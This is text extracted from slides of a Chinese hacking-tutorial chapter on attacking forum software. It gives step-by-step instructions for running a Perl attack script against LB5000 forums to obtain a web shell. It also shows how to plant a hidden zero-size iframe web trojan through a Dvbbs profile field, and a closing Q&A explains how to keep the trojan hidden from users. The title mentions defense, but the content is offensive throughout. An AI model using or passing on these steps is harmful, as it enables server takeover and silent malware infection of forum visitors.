恶意脚本入侵与防御

黑客攻防秘技实战解析（第2版）恶意脚本入侵与防御♂恶意脚本论坛入侵与防御♂剖析恶意脚本的巧妙应用恶意脚本论坛入侵与防御1极易入侵的BBS3000论坛2并不安全的论坛点歌台漏洞3雷奥论坛LB5000也存在着漏洞4被中上木马的DV7.0上传漏洞雷奥论坛LB5000也存在着漏洞在攻击目标论坛之前，需要先在该论坛上注册一个用户,具体的操作步骤如下：步骤1：在IE浏览器中打开将要攻击的论坛的页面，如图11-19所示。单击【按这里注册】链接按钮，即可进入【服务条款和声明】页面，如图11-20所示。雷奥论坛LB5000也存在着漏洞在攻击目标论坛之前，需要先在该论坛上注册一个用户,具体的操作步骤如下：步骤2：在阅读完条款内容之后，单击【我同意】按钮继续申请注册，进入【填写用户注册信息】窗口，如图11-21所示。步骤3：在此窗口中填写必要的用户名及密码等信息之后，单击【注册】按钮，即可看到注册成功的提示信息，如图11-22所示。雷奥论坛LB5000也存在着漏洞安装Perl解释器的具体操作步骤如下：步骤1：运行从网上下载的Perl解释器安装程序，即可打开【WelcometotheActivePerl5.8.8Build816Setupwizard（欢迎安装）】对话框，如图11-23所示。步骤2：单击【Next（下一步）】按钮，即可打开【End-UserLicenseAgreement（最终用户使用协议）】对话框，如图11-24所示。如果同意协议内容，则单击“IacceptthetermsintheLicenseAgreement（我接受上面的协议）”单选项。雷奥论坛LB5000也存在着漏洞安装Perl解释器的具体操作步骤如下：步骤3：单击【Next】按钮，即可打开【Selectthewayyouwantfeaturestobeinstalled（选择安装路径）】对话框，如图11-25所示。步骤4：单击【Browse（浏览）】按钮，即可打开【Changecurrentdestinationfolder（改变目标文件夹）】对话框，在其中设置Perl编译器的安装位置，如图11-26所示。雷奥论坛LB5000也存在着漏洞安装Perl解释器的具体操作步骤如下：步骤5：单击【OK】按钮，即可返回到【Selectthewayyouwantfeaturestobeinstalled（选择安装路径）】对话框，在其中可以看到设置的安装位置，如图11-27所示。步骤6：单击【Next】按钮，即可打开【ChooseSetupOptions（选择安装属性）】对话框，在其中选择相应的复选框，如图11-28所示。雷奥论坛LB5000也存在着漏洞安装Perl解释器的具体操作步骤如下：步骤7：单击【Next】按钮，即可打开【ReadytoInstall（准备安装）】对话框，如图11-29所示。单击【Install】按钮，即可打开【InstallingActivePerl5.8.8Build816（正在安装）】对话框，如图11-30所示。雷奥论坛LB5000也存在着漏洞安装Perl解释器的具体操作步骤如下：步骤8：待安装完毕后，即可看到【CompletingtheActivePerl5.8.8Build816Setupwizard（完成安装）】对话框，这里最好勾选“displaythereleasenotes（显示版本说明）”复选框，如图11-31所示。单击【Finish（完成）】按钮，即可看到以网页形式出现的版本说明信息，如图11-32所示。雷奥论坛LB5000也存在着漏洞下面以perl%s%s为例讲解具体的操作步骤：步骤1：在【命令提示符】窗口中输入“dir*.pl”命令，即可查找到下载得到的针对使用Perl%s%s解析论坛的攻击程序文件，如图11-33所示。步骤2：在其中运行“lb5k-perl.pl”命令，即可看到攻击论坛所使用的方法，如图11-34所示。在光标处运行“lb5k-perl.plhostnamepasswdway”命令，稍等片刻程序就能给出shell的地址。步骤3：在得到shell之后，在IE浏览器的地址栏内输入“http://(shell的地址)？dir”，即可完成对此论坛的攻击。使用isapi来解析的论坛，与此攻击方法类似，这里不再赘述。剖析恶意脚本的巧妙运用1全面提升ASP木马权限2利用恶意代码获得用户的Cookies3在动网论坛中嵌入网页木马4利用恶意脚本实现Cookie注入攻击在动网论坛中嵌入网页木马具体的操作步骤如下：步骤1：打开动网论坛，如图11-49所示。若还没有在该论坛中注册一个用户，则需要先单击【注册】按钮，在打开的【新用户注册】窗口中进行注册。步骤2：如果已经是注册用户，则单击【登录】按钮进行登录，成功登录后的界面如图11-50所示。在动网论坛中嵌入网页木马具体的操作步骤如下：步骤3：在该页面中选择【用户控制面板】→【联系资料修改】菜单项，即可打开个人资料修改页面，如图11-51所示。步骤4：在“论坛密码”栏中输入论坛密码，在“主页地址”文本框中输入代码“ScriptIframeheight=0width=0sRc=”http//网页木马地址”/Iframe”。使用这种方式挂的网页木马，由于网页框架是隐藏的，所以不容易被发现。这里为了显示挂马效果，不对网站造成危害，因此将网页框架扩大并用其他网址代替网页木马地址。在动网论坛中嵌入网页木马具体的操作步骤如下：步骤5：还需要在“MSN号码”文本框中输入相应的代码，如图11-52所示。ScriptLanguage=JavaScriptvaractioninfo3='单帖屏蔽'步骤6：单击【更新】按钮，即可提交修改资料内容。如果提交成功，则会看到“你修改的信息已成功提交”提示信息，如图11-53所示。在动网论坛中嵌入网页木马具体的操作步骤如下：步骤7：返回论坛，回复或新发一篇帖子，帖子的内容可以随意填写。发表成功后再查看新发的帖子，即可看到在新发的帖子页面中已经嵌入了一个网页框架，在框架中显示了“新起点工作室”的页面，如图11-54示。专家课堂（常见问题与解答）点拨1：在使用asp.dll全面提升ASP木马权限时，为什么会出现无法提升ASP木马权限的情况？解答：之所以会出现这种现象，主要原因在于adsutil.vbs权限使用不当。在使用adsutil.vbs时，一定要把原先的权限也加上，否则原先已加的就会丢失，且不同条目之间应用空格分开。点拨2：在动网论坛中嵌入网页木马时，应该采取哪些措施来避免用户发现？解答：如果使用隐藏的方法显示一个网页木马，那么用户在查看该帖子的时候，是很难发现黑客植入的网页木马。此时应将该网页框架长和宽都设置为0，则可实现网页框架隐藏。本章结束,谢谢观赏